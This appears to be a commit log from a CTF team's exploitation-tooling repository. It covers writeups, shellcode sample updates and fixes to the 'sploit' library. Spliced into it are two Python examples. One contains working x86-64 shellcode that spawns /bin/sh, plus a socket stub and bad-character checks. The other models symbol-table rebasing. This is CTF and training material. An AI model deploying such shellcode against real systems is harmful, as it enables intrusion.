| Age | Commit message | Author | Files | Lines |

* malf-amateursctf-2025:
    Writeup AmateursCTF 2025 / Easy heap
    Writeup AmateursCTF 2025 / Rewrite it in Zig
    Add link to online Java decompiler
    AmateursCTF 2025 results

Signed-off-by: Matt Hunter <m@lfurio.us>

Signed-off-by: Matt Hunter <m@lfurio.us>

Signed-off-by: Matt Hunter <m@lfurio.us>

Signed-off-by: Matt Hunter <m@lfurio.us>

Signed-off-by: Matt Hunter <m@lfurio.us>

* malf-braekerctf-2024:
    Writeup BraekerCTF 2024 / e
    Writeup BraekerCTF 2024 / Eye Doctor
    Add image convolution topic doc
    Add x86 loop instruction callout
    Merge x86 tips into architecture topic doc
    BraekerCTF 2024 results

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

* malf-lactf-2024:
    Update docker guide
    x86 register correction
    lactf 2024 results

The docker reference guide now better explains various common
situations. The file is moved to docs/nix since docker is not strictly
a web technology. This location makes more sense.
Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

* malf-bitsctf-2024:
    RSA link to factordb
    Consolidate forensics links and add FTKImager and volatility
    BITSCTF 2024 results

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Intended to provide a base environment for working with binary
exploitation challenges and enable process isolation of said binaries.
Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Sploit has been living on in another repository for the past year or so.
Remove the stale files from this repository.
Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

* malf-lactf-2023:
    Writeup LACTF 2023 / Switcheroo
    Writeup LACTF 2023 / CTFd plus
    Writeup LACTF 2023 / A hacker's notes
    Writeup LACTF 2023 / One more time pad
    lactf 2023 results

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Adds a reverse shell and other improvements for correctness, along with
a general cleanup of the files.
* shellcoding-enhancements:
    Ignore shellcode working files
    shellcode: Add sample for connecting a TCP socket
    shellcode: Update /bin/sh shellcodes
    shellcode: Remove shelltool
    shellcode: Update Makefile
    shellcode: Move example code to a new directory
    shellcode: Drop SYS_EXIT samples

* malf-xmas-2022:
    Writeup X-MAS CTF 2022 / Krampus Greetings
    Writeup X-MAS CTF 2022 / Santas Complaint Hotline
    X-MAS CTF 2022 results

Signed-off-by: Malfurious <m@lfurio.us>

This sample can be used to create a reverse shell when combined with the
shell64 sample:
    cat examples/{tcp64,shell64}.asm >code.asm
    make
    ...
Signed-off-by: Malfurious <m@lfurio.us>

The shell-spawning shellcodes are rewritten to address the following
concerns:
    - The array parameters to execve are now set properly, to valid
      arrays on the stack, instead of NULL pointers.
    - The cdq instruction is no longer used to sign-extend the rax
      register, since it has not been producing the expected results in
      gdb.
    - Labels, sections, and other file metadata are removed in order to
      support concatenation of shellcode samples to make more complex
      code.
Signed-off-by: Malfurious <m@lfurio.us>

shelltool is now deprecated, made redundant by the updated Makefile.
Signed-off-by: Malfurious <m@lfurio.us>

This patch brings various improvements to the shellcoding experience:
- There is no longer a hardcoded assembly sample that gets built
Although the default was pretty sane, it will be more convenient
to experiment, or build more complex shellcodes using a new
untracked filename as the main build target: code.asm
If code.asm is missing, then as before, it will be created from
shell64.asm (the old hard default).
The Makefile targets will compile code.* files.
- Hex string generation and bad char detection are improved
grep is used to highlight detected bad chars right in place.
This entire feature is now implemented directly in the Makefile
using a couple command lines, making shelltool deprecated.
- Builtin disassembly
Just run 'make disas' instead of manually invoking objdump. The
output is also filtered through grep for bad char detection.
- ELF executable is optional
Rather than linking an executable all the time, just run
'make elf' when you need it.
Signed-off-by: Malfurious <m@lfurio.us>
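An added example, in Python, of the three things the shellcode commits above describe: concatenating label-free samples the way `cat examples/{tcp64,shell64}.asm >code.asm` does, an execve sample whose argv array is built on the stack (a real array rather than NULL pointers, and no cdq), and the hex-string generation with bad-char highlighting that the Makefile took over from shelltool. This is not the repository's Makefile, shelltool or sample files. The machine code below is hand-assembled for this example and embedded as constructed input; the socket() fragment is only the first syscall of a connect sample, and the bad-char set {0x00, 0x0a, 0x0d} is an assumption to be adjusted per target.

```python
"""Added example: a small shellcode helper in the spirit of the Makefile
described above.  It concatenates label-free samples, emits a hex string,
and flags bad characters.  Nothing here is the repository's own code."""
from __future__ import annotations

# Constructed samples: hand-assembled x86-64 Linux machine code written for
# this example.  Encodings are the author's own, not the tcp64/shell64 files.

# socket(AF_INET, SOCK_STREAM, 0): the first step of a TCP-connect sample.
# connect() is deliberately not included; this fragment only shows that
# samples without labels or sections can be glued together.
SOCKET_STUB = bytes([
    0x6a, 0x29, 0x58,        # push 41 ; pop rax   (SYS_socket)
    0x6a, 0x02, 0x5f,        # push 2  ; pop rdi   (AF_INET)
    0x6a, 0x01, 0x5e,        # push 1  ; pop rsi   (SOCK_STREAM)
    0x31, 0xd2,              # xor edx, edx        (protocol 0)
    0x0f, 0x05,              # syscall
])

# execve("/bin//sh", ["/bin//sh", NULL], NULL) with argv built on the stack:
# a valid array instead of a NULL pointer, and edx cleared without cdq.
SHELL64 = bytes([
    0x31, 0xc0,                          # xor eax, eax
    0x50,                                # push rax            ; NUL terminator
    0x48, 0xbb, *b"/bin//sh",            # mov rbx, "/bin//sh" ; 8 bytes, no NUL
    0x53,                                # push rbx
    0x48, 0x89, 0xe7,                    # mov rdi, rsp        ; pathname
    0x50,                                # push rax            ; argv[1] = NULL
    0x57,                                # push rdi            ; argv[0] = pathname
    0x48, 0x89, 0xe6,                    # mov rsi, rsp        ; argv
    0x31, 0xd2,                          # xor edx, edx        ; envp = NULL
    0xb0, 0x3b,                          # mov al, 59          (SYS_execve)
    0x0f, 0x05,                          # syscall
])

# The same sample with the path written "/bin/sh\0": the immediate now
# carries a NUL byte, which the checker below must catch.
SHELL64_WITH_NUL = SHELL64.replace(b"/bin//sh", b"/bin/sh\x00")

BAD_CHARS = b"\x00\x0a\x0d"   # assumed set; adjust for the target's input path


def concat_samples(*samples: bytes) -> bytes:
    """cat examples/{a,b}.asm >code.asm, at the machine-code level."""
    return b"".join(samples)


def hex_string(code: bytes) -> str:
    """C-style "\\x.." string, the usual form pasted into an exploit."""
    return "".join(f"\\x{b:02x}" for b in code)


def find_bad_chars(code: bytes, bad: bytes = BAD_CHARS) -> list[tuple[int, int]]:
    """(offset, byte) for every bad byte, in order of appearance."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


def highlight(code: bytes, bad: bytes = BAD_CHARS) -> str:
    """Hex string with bad bytes bracketed in place, like the grep highlighting."""
    return "".join(f"[\\x{b:02x}]" if b in bad else f"\\x{b:02x}" for b in code)


def check(code: bytes, bad: bytes = BAD_CHARS) -> bool:
    """True when the code contains none of the bad bytes."""
    return not find_bad_chars(code, bad)


if __name__ == "__main__":
    combined = concat_samples(SOCKET_STUB, SHELL64)
    print(f"{len(combined)} bytes:", hex_string(combined))
    print("clean:", check(combined))
    print("with NUL:", highlight(SHELL64_WITH_NUL))
    print("bad at:", find_bad_chars(SHELL64_WITH_NUL))
```

`make disas` is not reproduced: disassembly needs objdump or a disassembler library, which this example does not assume. The functions never execute the bytes; feed SHELL64 to a runner only on a machine where spawning a shell is intended.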

This is mainly done to keep the top working directory (where the
Makefile lives) cleaner.
Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

Signed-off-by: Malfurious <m@lfurio.us>

This branch brings some conveniences to the semantics behind Symtbl base
values.
* sploit/symtbl-base:
    sploit: rev: Properly base Symtbls for non-PIC binaries
    sploit: Fix bugs involving Symtbl base value
    sploit: mem: Allow Symtbl base to be modified

This branch provides some payload-specific upgrades that have come out
of the development so far on the automated ROP chain builder.
* sploit/payload-rop-prep:
    sploit: payload: Promote private methods to "protected" access
    sploit: payload: Clean up automatic symbol naming
    sploit: payload: Class no longer extends Symtbl
    sploit: payload: Allow variadic insertions

The baddr property identified by r2 is now used as the base address for
ELF symbol tables. This should not change the addresses retrieved via
the table normally, however should fix the internal offsets of the table
so that rebasing makes sense.
Note that for PIC/PIE binaries we would already get a Symtbl with
'correct' offsets, as r2 is unable to absolutely resolve them for us.
In these cases, the Symtbl base value remains at zero.
Signed-off-by: Malfurious <m@lfurio.us>
Signed-off-by: dusoleil <howcansocksbereal@gmail.com>

Some code previously assumed a Symtbl's base value to always be zero.
This was often the case, however the assumption would break (for example)
when attempting to rebase() a mapped Symtbl.
As of the previous patch enabling freer modification of base, the
potentiality of these bugs will be higher.
Signed-off-by: Malfurious <m@lfurio.us>
Signed-off-by: dusoleil <howcansocksbereal@gmail.com>

Allow a Symtbl's base to be modified in-place, without mapping into a
new object. This is useful when working with the Symtbl aspect of a
Payload.
This includes setting a non-zero base on construction. As usual, when
defining base on construction, any additional kwargs symbols are
interpreted relative to the given base. The order of arguments does not
matter.
Signed-off-by: Malfurious <m@lfurio.us>
Signed-off-by: dusoleil <howcansocksbereal@gmail.com>
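An added example illustrating the base semantics the three sploit/symtbl-base commits above describe: symbols kept as offsets from a movable base, a non-PIE table based at r2's baddr so lookups are unchanged but offsets become meaningful, a PIE table left at base zero until it is mapped or rebased, and the bug class that comes from code assuming base is always zero. This is not sploit's Symtbl; the class, its method names (`offset`, `rebase`, `map`, `from_r2`) and all addresses are this example's own. It also assumes one reading of "interpreted relative to the given base": symbols passed together with a base are addresses in that base's frame, so the stored offset is addr - base.

```python
"""Added example: a minimal symbol table with a movable base, written to
illustrate the semantics described in the sploit Symtbl commits.  This is
not sploit's Symtbl; names, behaviour and addresses here are this example's."""
from __future__ import annotations


class Symtbl:
    """Symbols are stored as offsets from `base`; lookups return base + offset.

    Assumption (this example's reading of the commit message): symbols passed
    together with a base are addresses in that base's frame, so their offsets
    are recovered as addr - base.  Keyword order does not matter.
    """

    def __init__(self, base: int = 0, **symbols: int):
        self.base = base
        self._offsets = {name: addr - base for name, addr in symbols.items()}

    def __getattr__(self, name: str) -> int:
        # Only reached for names missing from __dict__, so base/_offsets
        # themselves never recurse through here.
        offsets = self.__dict__.get("_offsets", {})
        if name in offsets:
            return self.base + offsets[name]
        raise AttributeError(name)

    def __iter__(self):
        return iter(self._offsets)

    def offset(self, name: str) -> int:
        """Base-independent offset of a symbol."""
        return self._offsets[name]

    def rebase(self, new_base: int) -> Symtbl:
        """Move the table in place: addresses change, offsets do not."""
        self.base = new_base
        return self

    def map(self, new_base: int) -> Symtbl:
        """Copy of the table at another base; the original is untouched."""
        clone = Symtbl(new_base)
        clone._offsets = dict(self._offsets)
        return clone


def from_r2(symbols: dict[str, int], baddr: int, pie: bool) -> Symtbl:
    """The situation 'Properly base Symtbls for non-PIC binaries' describes.

    Non-PIE: r2 reports absolute addresses, so base = baddr fixes the internal
    offsets without changing any address a lookup returns.
    PIE: r2 can only report offsets, so base stays 0 until the load address
    is known and the table is mapped or rebased.
    """
    if pie:
        return Symtbl(0, **symbols)
    return Symtbl(baddr, **symbols)


def rebase_assuming_zero_base(tbl: Symtbl, new_base: int) -> Symtbl:
    """The bug class 'Fix bugs involving Symtbl base value' refers to: code
    that treats looked-up addresses as offsets, i.e. assumes tbl.base == 0.
    Correct for a zero-based table, wrong by exactly tbl.base otherwise."""
    return Symtbl(new_base, **{name: new_base + getattr(tbl, name) for name in tbl})


if __name__ == "__main__":
    # Hypothetical addresses for a non-PIE binary loaded at 0x400000.
    nonpie = from_r2({"main": 0x401136, "win": 0x4011F0}, baddr=0x400000, pie=False)
    print(hex(nonpie.main), hex(nonpie.offset("main")))          # unchanged / fixed
    # Hypothetical PIE: r2 gives offsets, base is zero until mapped.
    pie = from_r2({"main": 0x1136, "win": 0x11F0}, baddr=0, pie=True)
    loaded = pie.map(0x555555554000)
    print(hex(pie.main), hex(loaded.main))
    loaded.rebase(0x7F0000000000)                                  # in place
    print(hex(loaded.main))
    print(hex(rebase_assuming_zero_base(nonpie, 0x555555554000).main),
          hex(nonpie.map(0x555555554000).main))                    # differ by 0x400000
```

The naive helper is kept next to the correct `map` to make the failure concrete: once a table can carry a non-zero base, any code that adds a looked-up address to a new base double-counts the old one, which is exactly the class of bug the second commit above fixes.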